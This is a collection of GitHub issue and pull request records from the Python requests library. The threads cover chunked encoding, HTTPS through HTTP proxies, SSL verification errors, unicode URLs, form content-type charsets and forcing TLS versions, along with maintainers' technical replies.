{ "closed_at": null, "closed_issues": 29, "created_at": "2013-11-17T11:29:34Z", "creator": { "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }, "description": null, "due_on": null, "html_url": "https://github.com/psf/requests/milestone/20", "id": 487518, "labels_url": "https://api.github.com/repos/psf/requests/milestones/20/labels", "node_id": "MDk6TWlsZXN0b25lNDg3NTE4", "number": 20, "open_issues": 12, "state": "open", "title": "3.0.0", "updated_at": "2024-05-19T18:43:00Z", "url": "https://api.github.com/repos/psf/requests/milestones/20" }
9
2014-12-22T23:19:34Z
2021-09-08T07:00:55Z
2015-06-05T12:33:56Z
NONE
resolved
An empty chunk in the request body could prematurely signal the end of a chunked transmission. As a result, the terminating zero-size chunk sent by 'requests' can be interpreted as a bad request by the recipient. I have used the same logic as httplib to handle such cases. Please review this and comment.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2388/reactions" }
https://api.github.com/repos/psf/requests/issues/2388/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2388.diff", "html_url": "https://github.com/psf/requests/pull/2388", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2388.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2388" }
true
[ "Thanks for this!\n\nThe logic doesn't look quite right. Here, if we get an empty section from a generator, we stop sending the chunked body altogether. That doesn't seem like the correct logic to me. We should really do one of two things:\n1. Throw an exception. This means that users need to not send us empty chunks. This has the advantage of correctness, in that users are forced to choose what the correct behaviour is for empty chunks. It has the disadvantage of being annoying.\n2. Skip the chunk. We cannot emit it, that would be incorrect, so the only way to 'muddle on through' is to skip it. This has the advantage of continuing to work in the majority of cases, and the disadvantage of being a bit surprising in the remainder, where we send something other than what the user provided us.\n\nIf we want to do option 2, that means changing `break` for `continue`. @sigmavirus24, thoughts?\n", "Thanks for your comments.\n\nI agree that throwing an exception would be annoying. I noticed this issue when we were uploading a file with size being an exact multiple of our chunk size. We processed the EOF as an empty chunk and noticed broken-pipe errors all over the place in the server logs. We noticed this behavior after switching to requests and immediately fixed our code to stop sending EOF as a chunk. \n\nI do not think skipping the chunk is right either for the same reason you mentioned. We were earlier using httplib and hence proposed to a similar solution to stop sending altogether.\n\nLet me wait for more comments.\n", "So I had to re-read the [RFC section on Chunked Transfer Coding](http://tools.ietf.org/html/rfc7230#section-4.1) to make sure I remembered it correctly. The ABNF states: \n\n```\nlast-chunk = 1*(\"0\") [ chunk-ext ] CRLF\n```\n\nIn other words, the chunk that terminates a connect looks like\n\n```\n0\\r\\n\n```\n\nWhat we're essentially sending now is\n\n```\n0\\r\\n\\r\\n\n0\\r\\n\\r\\n\n```\n\nWhich is wrong.\n\nFrankly, I _really_ want this to throw an exception but I know that no one will like it. I think this especially causes problems if people are simply passing data through from a consumer of theirs. I think right now using `break` makes sense until we can come up with a more sensible way of doing this. ~~Also, I think we need to edit L398 to stop sending `0\\r\\n\\r\\n` because that doesn't appear correct (based on the RFC).~~ Edit: I just reread the ABNF for the entirety of the chunked body and the second `CRLF` is correct. Ignore me.\n", "I think I want this to throw an exception as well. It's annoying, but it's very Zen of Python (resist the temptation to guess etc. etc.).\n", "So either way we do this, the behaviour is _technically_ backwards incompatible. Right now, someone (trust me, I don't know who but this is oh so very plausible) is relying on us to:\n1. Not throw an exception, and\n2. Not skip empty chunks\n\nI really want this to be something we address but I don't think we can do so before 3.0. We should document this before 3.0 and perhaps start issuing a warning if we see an empty chunk so people can adjust, etc. before then. That said, I'm marking this as \"Do Not Merge\", \"Planned\", and adding the 3.0 milestone to it.\n", "Okay, we currently have 10 pull requests open for this project, many of which are labelled \"do not merge\". \n\nLet's get this cleaned up. \n", "@neosab can you resubmit this against the `proposed/3.0` branch?\n", "@sigmavirus24 Resubmitted this against proposed/3.0.0 branch in https://github.com/kennethreitz/requests/pull/2631\n", "Thanks @neosab! I'm closing this as a duplicate of #2631. Cheers! :sparkles: \n" ]
https://api.github.com/repos/psf/requests/issues/2387
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2387/labels{/name}
https://api.github.com/repos/psf/requests/issues/2387/comments
https://api.github.com/repos/psf/requests/issues/2387/events
https://github.com/psf/requests/issues/2387
52,582,146
MDU6SXNzdWU1MjU4MjE0Ng==
2,387
Request https url via http proxy
{ "avatar_url": "https://avatars.githubusercontent.com/u/3884436?v=4", "events_url": "https://api.github.com/users/RafTim/events{/privacy}", "followers_url": "https://api.github.com/users/RafTim/followers", "following_url": "https://api.github.com/users/RafTim/following{/other_user}", "gists_url": "https://api.github.com/users/RafTim/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/RafTim", "id": 3884436, "login": "RafTim", "node_id": "MDQ6VXNlcjM4ODQ0MzY=", "organizations_url": "https://api.github.com/users/RafTim/orgs", "received_events_url": "https://api.github.com/users/RafTim/received_events", "repos_url": "https://api.github.com/users/RafTim/repos", "site_admin": false, "starred_url": "https://api.github.com/users/RafTim/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/RafTim/subscriptions", "type": "User", "url": "https://api.github.com/users/RafTim", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2014-12-21T01:06:24Z
2021-09-08T23:06:48Z
2014-12-21T20:30:50Z
NONE
resolved
I recently tried to make a connection to a https url via a http proxy which doesn't support the 'connect' method (Crawlera http://scrapinghub.com/faq#https). I'm using the following code: import requests proxies = {"http": "http://USER:[email protected]:8010/", "https": "http://USER:[email protected]:8010/"} requests.get("https://wikipedia.org", proxies=proxies) will result in > Traceback (most recent call last): > File "<stdin>", line 1, in <module> > File "/usr/lib/python2.7/site-packages/requests/api.py", line 55, in get > return request('get', url, **kwargs) > File "/usr/lib/python2.7/site-packages/requests/api.py", line 44, in request > return session.request(method=method, url=url, **kwargs) > File "/usr/lib/python2.7/site-packages/requests/sessions.py", line 456, in request > resp = self.send(prep, **send_kwargs) > File "/usr/lib/python2.7/site-packages/requests/sessions.py", line 559, in send > r = adapter.send(request, **kwargs) > File "/usr/lib/python2.7/site-packages/requests/adapters.py", line 378, in send > raise ProxyError(e) Is there anything to do about that?
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2387/reactions" }
https://api.github.com/repos/psf/requests/issues/2387/timeline
null
completed
null
null
false
[ "A HTTP proxy that does not support the CONNECT verb cannot transport a HTTPS request.\n", "According to that proxy:\n\"... configure your HTTP client to use a HTTP proxy even for HTTPS URLs. However, not many clients support this for privacy reasons that don't apply to web crawling. cURL doesn't support it, but lwp-request does.\"\nIf \"this is not possible\" how does lwp-request support it?\n", "Let's be clear about what you're asking requests to do.\n\nA HTTPS request establishes a secure connection between your machine and the origin server. This means you encrypt the connection using TLS, which means you authenticate the origin server. This authentication is done using TLS certificates.\n\nCombining this with proxies is tricky. The proxy can't be the other end of the TLS connection because it doesn't have the correct certificate (nor should it!). This means all you can possibly do is establish a TCP tunnel through the proxy: you connect to the proxy, the proxy connects to the remote end, and then all packets just get forwarded through. This allows you to still perform the TLS handshake. That's exactly what the CONNECT verb is for: it establishes that TCP tunnel.\n\nTo do this _without_ the CONNECT verb requires that you make the TLS connection with the proxy instead, then use it like a standard HTTP proxy. This is a bad idea: it represents a man-in-the-middle attack. I can't stress this enough: you _need_ to ensure that you trust Crawlera before doing this.\n\nIf you _really_ want to do it, requests should be able to: set the scheme of the proxy URL you pass us to `https` rather than `http`. That will cause us to establish the TLS connection with the proxy itself. \n\nThat means your code changes to:\n\n``` python\nimport requests\nproxies = {\"http\": \"http://USER:[email protected]:8010/\",\n           \"https\": \"https://USER:[email protected]:8010/\"}\n\nrequests.get(\"https://wikipedia.org\", proxies=proxies)\n```\n" ]
https://api.github.com/repos/psf/requests/issues/2386
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2386/labels{/name}
https://api.github.com/repos/psf/requests/issues/2386/comments
https://api.github.com/repos/psf/requests/issues/2386/events
https://github.com/psf/requests/issues/2386
52,570,106
MDU6SXNzdWU1MjU3MDEwNg==
2,386
SSL verification fails with proxy
{ "avatar_url": "https://avatars.githubusercontent.com/u/614673?v=4", "events_url": "https://api.github.com/users/peterjeschke/events{/privacy}", "followers_url": "https://api.github.com/users/peterjeschke/followers", "following_url": "https://api.github.com/users/peterjeschke/following{/other_user}", "gists_url": "https://api.github.com/users/peterjeschke/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/peterjeschke", "id": 614673, "login": "peterjeschke", "node_id": "MDQ6VXNlcjYxNDY3Mw==", "organizations_url": "https://api.github.com/users/peterjeschke/orgs", "received_events_url": "https://api.github.com/users/peterjeschke/received_events", "repos_url": "https://api.github.com/users/peterjeschke/repos", "site_admin": false, "starred_url": "https://api.github.com/users/peterjeschke/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/peterjeschke/subscriptions", "type": "User", "url": "https://api.github.com/users/peterjeschke", "user_view_type": "public" }
[ { "color": "e11d21", "default": false, "description": null, "id": 136589914, "name": "Needs Info", "node_id": "MDU6TGFiZWwxMzY1ODk5MTQ=", "url": "https://api.github.com/repos/psf/requests/labels/Needs%20Info" } ]
closed
true
null
[]
null
11
2014-12-20T17:14:49Z
2021-09-08T22:00:53Z
2015-08-31T09:43:00Z
NONE
resolved
Using this code: ``` import requests requests.get('https://github.com') ``` Throws the following exception: ``` Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/usr/lib/python2.7/site-packages/requests/api.py", line 55, in get return request('get', url, **kwargs) File "/usr/lib/python2.7/site-packages/requests/api.py", line 44, in request return session.request(method=method, url=url, **kwargs) File "/usr/lib/python2.7/site-packages/requests/sessions.py", line 456, in request resp = self.send(prep, **send_kwargs) File "/usr/lib/python2.7/site-packages/requests/sessions.py", line 559, in send r = adapter.send(request, **kwargs) File "/usr/lib/python2.7/site-packages/requests/adapters.py", line 382, in send raise SSLError(e, request=request) requests.exceptions.SSLError: hostname '<Proxy>' doesn't match either of 'github.com', 'www.github.com' ``` where <Proxy> is the URL of the http(s)-proxy I'm using. I have set the environment-variables HTTP_PROXY and HTTPS_PROXY (lowercase, too) to that URL. Is it possible to avoid that error without appending verify=False so I don't have to mess with other projects?
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2386/reactions" }
https://api.github.com/repos/psf/requests/issues/2386/timeline
null
completed
null
null
false
[ "Does the URL to your proxy begin with `https://`? That will cause us to try a TLS handshake with that proxy, which obviously fails as that proxy isn't authoritative for that domain. If this is the case, try setting the protocol to `http://`.\n", "It does start with https://, but setting it to http:// doesn't help.\n", "@looperhacks can you tell us what kind of proxy this is? Also, I doubt it will help, but have you attempted to use the `proxies` argument to `get`?\n", "I don't know the software used, but using a squid-proxy causes the same problem. `proxies` doesn't help either.\n", "When you say switching to `http://` doesn't help, do you mean you're getting the exact same error?\n", "Yes. \n", "`curl` doesn't seem to accept `http_proxy=https://...`. I can't make Chrome use an HTTPS proxy either. Is this something people use?\n", "It is extremely uncommon, but it does exist and we do technically support it.\n", "Duplicate: https://github.com/shazow/urllib3/issues/531\n\nBTW, there is no support for HTTPS proxies in requests/urllib3, see https://github.com/kennethreitz/requests/issues/1622\n", "Ah, thanks for the reminder @schlamar, I had forgotten that we regressed/removed this.\n", "Not quite, the current behavior is that HTTPS via HTTPS proxy silently degrades to HTTPS via HTTP proxy... ;)\n" ]
https://api.github.com/repos/psf/requests/issues/2385
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2385/labels{/name}
https://api.github.com/repos/psf/requests/issues/2385/comments
https://api.github.com/repos/psf/requests/issues/2385/events
https://github.com/psf/requests/issues/2385
52,506,296
MDU6SXNzdWU1MjUwNjI5Ng==
2,385
POST to url with unicode character
{ "avatar_url": "https://avatars.githubusercontent.com/u/1793789?v=4", "events_url": "https://api.github.com/users/burdiyan/events{/privacy}", "followers_url": "https://api.github.com/users/burdiyan/followers", "following_url": "https://api.github.com/users/burdiyan/following{/other_user}", "gists_url": "https://api.github.com/users/burdiyan/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/burdiyan", "id": 1793789, "login": "burdiyan", "node_id": "MDQ6VXNlcjE3OTM3ODk=", "organizations_url": "https://api.github.com/users/burdiyan/orgs", "received_events_url": "https://api.github.com/users/burdiyan/received_events", "repos_url": "https://api.github.com/users/burdiyan/repos", "site_admin": false, "starred_url": "https://api.github.com/users/burdiyan/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/burdiyan/subscriptions", "type": "User", "url": "https://api.github.com/users/burdiyan", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2014-12-19T17:14:07Z
2021-09-08T23:06:49Z
2014-12-21T15:41:52Z
NONE
resolved
Hello, I have this code for making POST request to url with unicode character. I tried to replace `í` to `%C3%AD` but python is still telling me: `UnicodeEncodeError: 'ascii' codec can't encode character '\xf3' in position 1771: ordinal not in range(128)` ``` # coding=UTF-8 import requests url = u'http://www.madridmovilidad.es/localizador-vehículo.aspx?idioma=es' payload = {'veh_matricula': '5555HWS'} url = url.encode('UTF-8') r = requests.post(url, data=payload) print(r.text) ``` I'm new to Python, but I have tried all I could find to solve python unicode "problems" but nothing helps. So maybe this is requests problem? Can anyone help me, please? Thank you!
{ "avatar_url": "https://avatars.githubusercontent.com/u/1793789?v=4", "events_url": "https://api.github.com/users/burdiyan/events{/privacy}", "followers_url": "https://api.github.com/users/burdiyan/followers", "following_url": "https://api.github.com/users/burdiyan/following{/other_user}", "gists_url": "https://api.github.com/users/burdiyan/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/burdiyan", "id": 1793789, "login": "burdiyan", "node_id": "MDQ6VXNlcjE3OTM3ODk=", "organizations_url": "https://api.github.com/users/burdiyan/orgs", "received_events_url": "https://api.github.com/users/burdiyan/received_events", "repos_url": "https://api.github.com/users/burdiyan/repos", "site_admin": false, "starred_url": "https://api.github.com/users/burdiyan/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/burdiyan/subscriptions", "type": "User", "url": "https://api.github.com/users/burdiyan", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2385/reactions" }
https://api.github.com/repos/psf/requests/issues/2385/timeline
null
completed
null
null
false
[ "I did the following on python 2.7 and 3.4 and had no problems\n\n``` python\nurl = u'http://www.madridmovilidad.es/localizador-vehículo.aspx?idioma=es'\npayload = {'veh_matricula': '5555HWS'}\nrequests.get(url)\nrequests.post(url, data=payload)\n```\n\nCould you provide the entire stacktrace? I suspect this is actually coming from your calling `print(r.text)`.\n", "@sigmavirus24 You are right. That was because of `print(r.text)` call. Thank you!\n", "@burdiyan the next time you have _questions_ and need help, please use our official Q&A section on [StackOverflow](https://stackoverflow.com/questions/tagged/python-requests). You'll get an answer much faster.\n" ]
https://api.github.com/repos/psf/requests/issues/2384
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2384/labels{/name}
https://api.github.com/repos/psf/requests/issues/2384/comments
https://api.github.com/repos/psf/requests/issues/2384/events
https://github.com/psf/requests/pull/2384
52,464,722
MDExOlB1bGxSZXF1ZXN0MjYzNjA1Nzk=
2,384
set charset in content type if UTF-8 data was encoded
{ "avatar_url": "https://avatars.githubusercontent.com/u/3083638?v=4", "events_url": "https://api.github.com/users/bm371613/events{/privacy}", "followers_url": "https://api.github.com/users/bm371613/followers", "following_url": "https://api.github.com/users/bm371613/following{/other_user}", "gists_url": "https://api.github.com/users/bm371613/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/bm371613", "id": 3083638, "login": "bm371613", "node_id": "MDQ6VXNlcjMwODM2Mzg=", "organizations_url": "https://api.github.com/users/bm371613/orgs", "received_events_url": "https://api.github.com/users/bm371613/received_events", "repos_url": "https://api.github.com/users/bm371613/repos", "site_admin": false, "starred_url": "https://api.github.com/users/bm371613/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/bm371613/subscriptions", "type": "User", "url": "https://api.github.com/users/bm371613", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2014-12-19T09:47:50Z
2021-09-08T09:01:07Z
2014-12-19T10:26:32Z
NONE
resolved
Content type `'application/x-www-form-urlencoded'`, that is automatically provided by requests sometimes, should actually be `'application/x-www-form-urlencoded; charset=UTF-8'` if provided data is UTF-8.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2384/reactions" }
https://api.github.com/repos/psf/requests/issues/2384/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2384.diff", "html_url": "https://github.com/psf/requests/pull/2384", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2384.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2384" }
true
[ "This is incorrect behaviour, I'm afraid.\n\nThe `charset` parameter is only defined for documents of type `text/*`. That does not apply to `application/x-www-form-urlencoded`. Therefore, sending `charset` would be a specification violation.\n\nOur behaviour is consistent with the W3C HTML5 specification, which says the following:\n\n> If the form element has an accept-charset attribute, let the selected character encoding be the result of picking an encoding for the form.\n> \n> Otherwise, if the form element has no accept-charset attribute, but the document's character encoding is an ASCII-compatible character encoding, then that is the selected character encoding.\n> \n> Otherwise, let the selected character encoding be UTF-8.\n\nWe can't do either of the first two things because we don't know what the document or form looks like, so we can only do the third. If the user wants a different behaviour (per the first two points) they are required to do it themselves.\n\nI'm sorry we can't accept this, but this is one of those things that seems like it should be simple but is actually quite complex.\n", "OK, lesson learnt.\n" ]
https://api.github.com/repos/psf/requests/issues/2383
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2383/labels{/name}
https://api.github.com/repos/psf/requests/issues/2383/comments
https://api.github.com/repos/psf/requests/issues/2383/events
https://github.com/psf/requests/issues/2383
52,218,518
MDU6SXNzdWU1MjIxODUxOA==
2,383
Force use of tls with requests
{ "avatar_url": "https://avatars.githubusercontent.com/u/10159045?v=4", "events_url": "https://api.github.com/users/tesande/events{/privacy}", "followers_url": "https://api.github.com/users/tesande/followers", "following_url": "https://api.github.com/users/tesande/following{/other_user}", "gists_url": "https://api.github.com/users/tesande/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/tesande", "id": 10159045, "login": "tesande", "node_id": "MDQ6VXNlcjEwMTU5MDQ1", "organizations_url": "https://api.github.com/users/tesande/orgs", "received_events_url": "https://api.github.com/users/tesande/received_events", "repos_url": "https://api.github.com/users/tesande/repos", "site_admin": false, "starred_url": "https://api.github.com/users/tesande/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/tesande/subscriptions", "type": "User", "url": "https://api.github.com/users/tesande", "user_view_type": "public" }
[]
closed
true
null
[]
null
8
2014-12-17T09:34:16Z
2021-09-08T23:06:49Z
2014-12-18T23:19:41Z
NONE
resolved
Hi ! I have used requests successfully for calling some rest resources. I have called these resources in our staging environment, and things has worked well. Now I've tried to call the resources in our test environment, but receives the error SSL3_GET_RECORD:decryption failed or bad record mac. I recon there is a problem with the ssl connection, and want to try forcing requests to use TLS v1. How can I achieve this? I have tried creating the class ForceTLSV1Adapter which is described here http://stackoverflow.com/questions/26733462/ssl-and-tls-in-python-requests, but I don't know how to tell requests to use this class. Could you please give me a hint? Thanks in advance Tor Erik
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2383/reactions" }
https://api.github.com/repos/psf/requests/issues/2383/timeline
null
completed
null
null
false
[ "By the way, I've seen the advanced usage documentation (http://docs.python-requests.org/en/latest/user/advanced/), and tried to modify the Ssl3HttpAdapter to be a TLS Adapter. \nI use s = requests.Session() s.mount to mount the adapter. In the mount command, I have both tried the rest resource url and the root url (https://mydomain.com)\n", "It's possible that the SSL version you need to try isn't TLSv1. Try SSLv3, for example.\n\n> On 17 Dec 2014, at 10:01, tesande [email protected] wrote:\n> \n> By the way, I've seen the advanced usage documentation (http://docs.python-requests.org/en/latest/user/advanced/), and tried to modify the Ssl3HttpAdapter to be a TLS Adapter. \n> I use s = requests.Session() s.mount to mount the adapter. In the mount command, I have both tried the rest resource url and the root url (https://mydomain.com)\n> \n> —\n> Reply to this email directly or view it on GitHub.\n", "I have tried that as well. Same error message. To me it seems the adapter isn't used, since the error message indicates SSL3. \nHow is it supposed to be plugged in? Am I correct about the request.Session() and mount() Should I mount all the addresses, or only the domain url?\n", "The adapter is definitely being used if correctly plugged in. When you call `mount`, you pass two arguments: the first is a prefix to match, the second is an instance of your adapter. So long as your prefix matches your URL this should work fine: if it continues to fail, the problem is not that.\n\nAgain, try all the TLS constants available to you, all the way up to PROTOCOL_TLSv1_2 if your OpenSSL supports it. If that continues not to work, the problem is not the protocol we're using to do the negotiation.\n", "I ran my two servers through ssllabs. One big difference is: \nThere is no support for secure renegotiation. \n\nI guess this could be a reason. \nIs it a workaround, or do I have to make the ops guys update the server?\n", "I have tried the following: Changed protocol for communication with one of the working servers to SSL2. Although my server doesn't support SSL 2 (Stated by ssllabs), the communication still works. I think that's weird. \n\nHere is my mounting code: \nurltorun = environment + \"/\" + url\ns=requests.Session()\ns.mount(urltorun,Ssl3HttpAdapter() )#Has changed the class implementation but not the class name\nsmoketeststorun = requests.get(urltorun)\n\nAdapter: \nclass Ssl3HttpAdapter(HTTPAdapter):\n\n```\ndef init_poolmanager(self, connections, maxsize, block=False):\n print 'Yjoooooooooooooooooooooooooooninh'\n self.poolmanager = PoolManager(num_pools=connections,\n maxsize=maxsize,\n block=block,\n ssl_version=ssl.PROTOCOL_TLSv1)\n```\n", "That code appears to negotiate TLSv1, not SSLv2.\n", "This is clearly _not_ a bug in requests. Further work on this _question_ should take place on the forum for questions about requests, [StackOverflow](https://stackoverflow.com/questions/tagged/python-requests).\n" ]
https://api.github.com/repos/psf/requests/issues/2382
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2382/labels{/name}
https://api.github.com/repos/psf/requests/issues/2382/comments
https://api.github.com/repos/psf/requests/issues/2382/events
https://github.com/psf/requests/pull/2382
52,083,753
MDExOlB1bGxSZXF1ZXN0MjYxMjg3MzQ=
2,382
catch exception more specifically
{ "avatar_url": "https://avatars.githubusercontent.com/u/3482660?v=4", "events_url": "https://api.github.com/users/daftshady/events{/privacy}", "followers_url": "https://api.github.com/users/daftshady/followers", "following_url": "https://api.github.com/users/daftshady/following{/other_user}", "gists_url": "https://api.github.com/users/daftshady/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/daftshady", "id": 3482660, "login": "daftshady", "node_id": "MDQ6VXNlcjM0ODI2NjA=", "organizations_url": "https://api.github.com/users/daftshady/orgs", "received_events_url": "https://api.github.com/users/daftshady/received_events", "repos_url": "https://api.github.com/users/daftshady/repos", "site_admin": false, "starred_url": "https://api.github.com/users/daftshady/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/daftshady/subscriptions", "type": "User", "url": "https://api.github.com/users/daftshady", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-12-16T08:04:53Z
2021-09-08T09:01:08Z
2014-12-16T09:19:50Z
CONTRIBUTOR
resolved
Because `raise_for_status` only raises `HTTPError`, I think it's better to catch `HTTPError` which is a subclass of `RequestException`. Please review this.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
